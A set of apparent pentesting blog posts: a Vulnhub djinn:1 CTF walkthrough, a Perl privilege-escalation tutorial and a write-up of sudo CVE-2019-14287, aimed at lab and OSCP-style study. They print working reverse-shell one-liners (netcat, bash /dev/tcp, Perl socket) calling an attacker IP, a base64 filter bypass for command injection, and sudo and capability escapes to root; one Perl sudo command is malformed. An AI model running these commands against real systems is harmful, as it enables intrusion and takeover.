djinn:1 Vulnhub Walkthrough

Hello guys, today we will face an Intermediate challenge. Introducing the djinn: 1 virtual machine, created by “0xmzfr” and available on Vulnhub. This is another Capture the Flag Style Challenge where we have to escalate privileges to the “root user” and find 2 flag to complete the challenge.

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Methodologies:

·         Network Scanning

o   Netdiscover

o   Nmap Scan

·         Enumeration

o   FTP Enumeration

o   Browsing HTTP Service

o   Netcat

o   Directory Bruteforce using gobuster

o   Discovering Command Injection

·         Exploitation

o   Bypassing Command Injection Filter

o   Getting Netcat Session

o   Enumeration Files and Directories

·         Post Exploitation

o   Reading the User Flag

o   Getting Login Credentials

o   Enumeration for Sudo Permissions

·         Privilege Escalation

o   Abusing Sudo Rights

o   Confirm Root Access

o   Reading the Root Flag

Walkthrough

Network Scanning

The first step is to identify the target. So, to identify your target we will use the following command:

netdiscover

Now we will use Nmap to gain the information about the open ports and the services running on the target machine using the command

nmap -p- 192.168.43.134

So as we can see that port 21/TCP is open so we can try for anonymous login to fetch some useful information.

Enumeration

Yes! We are in! There are three files here namely creds, game and message.

ftp 192.168.43.134

anonymous

ls

We can see let’s try to download these three files in our kali machine and try to read their content

Command used to download these files are:

get creds.txt

get game.txt

get message.txt

We downloaded the all three files in our Kali machine and now it’s time to see the content of these files using the command cat

cat creds.txt

cat game.txt

cat message.txt

So we have three things that seems to be useful for us, but SSH port is filtered so clearly these creds can’t be used to login via SSH. let’s note down these three highlighted parts in a file for future reference.

But according the message.txt file there is a game running on port 1337. let’s play the game.

http://192.168.43.134:1337

We get an error: This page isn’t working. So in this case we will use Netcat to make connection so that we can play the game

nc 192.168.43.134 1337

As we can see in the above image that the we need to answer such simple maths question 1000 times and for sure we are not going to do that. The reason is: playing this game is time consuming and we are not sure about after solving 1000 times is there any gift for us which will help us or it’s just some greeting message to boost up our confidence.

So without wasting our time let’s try another port that is 7331

http://192.168.43.134:7331

We don’t find anything useful. after checking the source code there is no information that can be used to login to any of the account in the targeted machine. So now we can think of directory buster, means it’s time to find some hidden directories and pages at this particular port. We used the gobuster tool for directory Bruteforce. This gave us two pages ‘/genie’ and’/wish’.

gobuster dir -u http://192.168.43.134:7331 -w /usr/share/wordlists/dirb/big.txt

We opened the /genie page. It is showing an error that is ERROR 403. So this page might be of no use.

http://192.168.43.134:7331/genie

We open this another page named /wish. This contained text saying “Oh you found me then go on make a wish. This can make all your wishes come true.” Followed by a form input section and Submit button. This is absolutely interesting.

http://192.168.43.134:7331/wish

So it’s time to explore the /wish. As there is a form at this page so for a second we can think of OS command injection. Ok let’s try some common commands if we are going in right direction or not

id

So the “id” command is executed successfully. It means we were right before. This is OS command injection and we can take advantage of this vulnerability to get a shell using Netcat.

Let’s do it!

Exploitation

We started a Netcat listener on our Kali Machine. Then we tried to invoke the Netcat shell from the Command Injection that we just found.

nc -nlvp 1234

nc -e /bin/sh 192.168.43.249 1234

It gives a message: Wrong choice of words

So after trying lot of command we can conclude that some of the symbols are characters are restricted. if those characters are present in the command then the command is not going to be executed.

So after thinking a lot we came up with a solution what if encrypt the whole command in base64 format because commands like “echo”,” base64 -d” and “bash” are working.

Website used to encrypt: https://www.base64encode.org/enc/encore/

nc -e /bin/sh 192.168.43.249 1234

Encoded command: bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjQzLjI0OSAxMjM0

So now we will use pipe (|) operator to make our work done!

After experimenting a lot with /wish page we came up with this command:

echo bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjQzLjI0OSAxMjM0 | base64 -d | bash

But our luck is not good, this doesn’t work. It gives no error but this command doesn’t give us the shell access either. Now it’s time to search for some other forms of commands to get a shell and we will try this:

bash -i >& /dev/tcp/192.168.43.249/8080 0>&1

So we encoded this command using the same website. So now we will try the below written command in /wish page. Don’t forget to start the listener using the command shown below.

nc -nlvp 8080

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjI0OS84MDgwIDA+JjE=

We got the shell using this technique. We ran the command whoami to find the user of which we just got the shell. It came out to be www-data.

We decided to look around the machine. We found a directory named 80 in the opt directory. We opened it. Here we find some files. We took at the app.py file. We found the path to a file named creds.txt. Let’s change the directory to the given directory and try to read the credentials.

ls

cat app.py

We navigated to the path mentioned in that file. We found the credential for the user nitish.

cd /home

cd nitish/.dev/

cat creds.txt

We decided to login in as nitish. To do this we used the bash command. This invoked a bash shell, we converted that shell into a TTY shell using the python one liner.

bash

python -c 'import pty;pty.spawn("/bin/sh")'

We changed the user with the help of the su command. After entering the password that we found earlier we successfully logged in as nitish.

su nitish

p4ssw0rdStr3t0n9

whoami

Post Exploitation

Now that we reached a stage in out exploitation that we have the access of a user. We decided to look for the user flag that is hidden. We traversed into the nitish user home directory. Here we found the user.txt. This is the User Flag. Congratulations!! We found our first flag.

ls

cd nitish

ls

cat user.txt

Now it’s time to check for Sudo rights of the user nitish using the command:

sudo –l

We found that the user nitish can execute the genie binary without any password for user sam.

As this is a custom user generated script. We started tinkering it in order to understand the working of the script.

genie

genie -h

After messing around with this binary we successfully managed to get a shell of user sam using the command:

sudo -u sam genie -cmd new

whoami

Now we will try to get a stable shell using the command bash and after that we will check for sudo rights for the user sam. We again tried to enumerate the Sudo Permissions. As we can see that we can execute the /root/lago as root so let’s do it!

bash

sudo -l

Privilege Escalation

After trying a lot, we find a solution that it is possible if we can manage the correct number then we can get access to the root shell and yes we are right this time too. After multiple tried we enter the choice 2 and then type in “num” and successfully got a root shell.

sudo -u root /root/lago

2

num

whoami

We used the bash command to get a proper shell of the root user. Now that we are root user, we need to find the root flag. Instead to wandering here and there we decided to go to the root directory of the root user. Here, find a script named proof.sh.

bash

su root

cd

ls

We ran the script, It gave us the final root flag that was needed to complete this CTF Challenge.

./proof.sh

Author: Yash Saxena an undergraduate student pursuing B. Tech in Computer science and engineering with a specialization in cybersecurity and forensics from DIT University, Dehradun. Contact here.

Linux for Pentester: Perl Privilege Escalation

Here we are again came back with one of very essential command i.e. “Perl”. As we know perl has it’s significant in the era of programming language specially designed for text editing. Apart from all of this, now it is also vary prominent for a variety of purposes including Linux system administration, network programming, web development, etc. So keeping this fact into our mind we will proceed to this article that how we can take more advantage of this command in the operation of Privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Content

Overview of Perl             

·         Introduction: What is perl?

·         Where we use perl?

·         What are it’s neccesities?

·         Multiple operation using perl.

Abusing Perl

·         SUDO Lab setups for privilege Escalation

·         Exploiting SUDO

·         Capabilities

What is perl ?

Perl is a programming language that stands for "Practical Extraction and Reporting Language".  It was created by Larry Wall in 1987 which is specially designed for text editing purpose.  As we all knows computers understand only binary language i.e “0,1” or one can say low-level language, Which is vary difficult for humans to program in a binary language. So to overcome that difficulty we was needed a programming language which uses natural language elements, words that are used in common English language that can be easily understand by humans [high-level language].

So once a program is coded by human, it need to be converted into the form that a computer understands. For that, we need something which can translate the high-level language to low-level language. Here interpreter comes to our help which is a software that converts the program written in the high-level language to low-level language for the computer to understand and execute the instructions written in the program. Hence, Perl is an interpreted programming language.

It was originally a language optimized for scanning arbitrary text files, extracting information from those text files, and printing reports based on that information.

Where we use perl ?

The influence of Perl can be applied in many fields abd the most popular use of Perl is in Web development. As we know that the major role and purpose of perl is for text editing and extracting data and generating reports. Perl has become a popular language used in web development, networking and bioinformatics too. Apart from all this perl can also be used for CGI programming.

What are it’s necessities ?

As we all know there are many programming languages that can be used to do all the stuff which can be achieved by the help of perl.

So here is the question arises that, why should we specifically use “perl” ? Perl is very easy to learn, particularly if you have a background in computer programming. It is extremely portable which can run on any operating system that has Perl interpreter installed, so it is platform independent. All Linux Operating Systems come installed with Perl, so you can start Perl coding in Linux out of the box.

Alike other language Perl is faster and more powerful in performing many task. It possess many shortcuts which allow the user to write quick scripts. It was designed specifically for text processing. It built-in text processing ability makes Perl as widely used server-side programming language.

So on moving ahead in achieving our goal of Privilege Escalation vary first we will check for it’s version. For this purpose we will use “-v” option as shown below.

perl -v

To know more about all those operations that a perl can do we will use its help command which will direct us for other functionality.

perl -h

Multiple operation of perl

Help in scripting: As we know unlike other programs that are written in languages such as C and C++, Perl programs do not need to compile for its execution, it’s simply interprets and executes the Perl programs. The term script often is used for such interpreted programs written in a shell's programming language or in Perl.

For example as per below image you can see I’ve created a file “script.pl” in which I have stored some line of codes or can say have created a small script (one can use it in creating any script as per requirements) that need to execute program over screen. So, to view your script use command as bellow:

cat script.pl

perl script.pl

Help to execute code on command line: This can be used to run a piece of Perl code without creating a file. Due to differences between the Unix/Linux shell and the MS Windows Command prompt we need to use different quotes around our code.

Here in below screenshot I’m running a piece of code which is “Welcome to Ignite Technologies” by using “-e” argument to execute the same.

perl -e ‘print qq{Welcome to Ignite Technologies\n}’

Note: In simple words one can say that this option “-e” is used to execute or print one line of code.

Help in restricted shell environment: A user can use -e option to break out from restricted environments by spawning an interactive system shell and it palys an especial role in privilege escalation. By the help of this we can also run any command in a restricted environment. Suppose in our case here I’m using this option to run tail command for displaying last few lines of /etc/passwd file.

perl -e ‘exec “/bin/sh”; ‘

perl -e ‘exec “tail /etc/passwd’; ‘

Help to wrap the code in while loop:  If we wish to wrap our code inside the loop which depends upon certain conditions within a code which is defined by perl then we will use “-n” option for that case.

For example, in below image you can see that I have a file named as “Infosec.txt” and here instead of displaying whole content I just want to print those lines which fulfil condition.

cat Infosec.txt

perl -n -E ‘say if /Testing/’ Infosec.txt

On framing above command perl will check to each line of file Infosec.txt and will print all those lines which contain our search word i.e Testing.

Help to edit file content: Perl command also be used in editing any file content. For executing the same we will use “-i” argument which will opens files one by one and replaces the content with STDOUT.

As you can see in below image I’ve used this option to convert the content of file Infosec.txt in upper case.

perl -pi -e “tr /[a-Z]/[A-Z]/” Infosec.txt

head -7 Infosec.txt

The most common use of “-p” together with the “-i” option also helps to provide "in-place editing". Which means that instead of printing to the screen, all the output spawned by our one-liner will be written back to the same file from where it was taken. Here we are using this to replace a word with other word.

perl -i -p -E ‘s/IGNITE/Egnite/’ Infosec.txt

head -7 Infosec.txt

On framing above command you perl will replace the word “IGNITE” with “Egnite” of file Infosec.txt

Perl in reverse shell: We all knows that reverse shell is a type of shell in which the target machine interconnects to the attacking machine and the attacking machine has a listener port on which it receives the connection.

So, here we are using perl command which will send back a reverse shell to a listening attacker that will open a remote network access.

perl -e 'use Socket;$i="192.168.29.157";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

On framing above command run nc -lvp 1234 on the attacker box to receive the shell.

nc -lvp 1234

id

whoami

Abusing perl

Sudo Rights Lab setups for Privilege Escalation

In above all, we have covered the main objectives that a perl can perform but now we will move ahead in the task of privilege escalation. So to grab this first, we have to set up our lab of perl command with administrative rights. After that we will check for the perl command that what impression it has after getting sudo rights and how we can use it more for privilege escalation.

From the below image It can be clearly understood I have created a local user (demo) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

demo All=(ALL) NOPASSWD: /usr/bin/perl

Exploiting Sudo rights

On adding user “demo” to etc/sudoers file, now we will start exploiting perl facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of victim’s machine then only we can execute this task. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

ssh demo@192.168.29.137

Then we look for sudo right of “demo” user (if given) and found that user “demo” can execute the perl command as “root” without a password.

whoami

sudo -l

sudo perl -e “/bin/bash”; ‘

whoami

Capabilities in Privilege Escalation

As we know that whenever any sticky bit is set to any file then every privileged and unprivileged user can easily access those files but if for security purpose if we want to share or get access those only with limited/single user then we can simply use capabilities for acquiring this operation.

The capability-based security states to the principle of manipulative user programs such that they directly share capabilities with each other according to the principle of least privilege to make transactions efficient and secure. For this task we simply copy the file to the /home of selected user to get it securely accessible.

As above stated where I’ve added user “demo” to /etc/sodoers and knows that user “demo” can execute the perl command as “root” without a password but I also except this user no one can access this file so I will set capabilities for this user as shown below.

which perl

cp $(which perl) /home/demo

setcap cap_setuid+ep /home/demo/perl

From below image it has been cleared that user “demo” can easily execute “perl” as root and hence we have successfully accomplished our mission of privilege escalation using perl.

./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

id

Conclusion: The main influence of this article is to use “perl” command for privilege escalation that’s why we have just covered the basic operation that can be achieved by the use of this command.

SUDO Security Policy Bypass Vulnerability - CVE-2019-14287

After the detection of a major security vulnerability, Official released an immediate security fix to the ' sudo ' kit in the Ubuntu repositories. If you are not aware of sudo right’s power then read this post “Linux Privilege Escalation using Sudo Rights” that help you to understand more above “CVE-2019-14287” the latest vulnerability which we will discuss in this post.

In sudo before 1.8.28 the vulnerability CVE-2019-14287 is a security policy bypass issue in Linux/Ubuntu  before 19.10 that offers a local user or a program the ability to carry out commands as root or super user on a Linux system when the "sudoers configuration" clearly prohibits the root access.

For example, this allows bypass of “! Root” configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.

Exploiting CVE-2019-14287

Victim’s Machine

Let’s suppose the system admin has created a local user who is not allow to perform high privilege task such as “cat /etc/shadow” to read saved the password of the system.

Similarly we have created a user “demo” who is not able to run privilege task as super user.

But if admin will make the following configuration with the suoders file:

demo ALL=(ALL,!root) ALL

where admin has assign sudo rights to the user “demo” to run programs or command as super user other than root and clearly prohibits the root access using !root.

Or the system admin can use following configuration too which stats same permission as said above.

demo ALL=(ALL,!#0) ALL

Let understand once again what is sudo right and what it defines as configured above by taking help of the following image:

Username: demo

Host: ALL

Runas (user): ALL,!root

Runas(group): ALL,!root

Tag: NOPASSWD

Command to execute: ALL

So basically here demo is define to execute ALL command as ALL (User,Group) other than root (User,Group) and “ALL,!root” is misconfiguration and causes the security loopholes because the user demo is restricted to perform task as root but not as admin. As result he can run a command as administrator (user "root") .  

In other words, this fault gives the privilege of a local user (attacker) accessing root shell as demonstrated. Assume the attack has the host machine shell as local user and he found above mentioned sudo rights then  the attacker can easily escalated the root privilege by using privilege user’s id i.e. -u#-1

sudo -u#-1 /bin/bash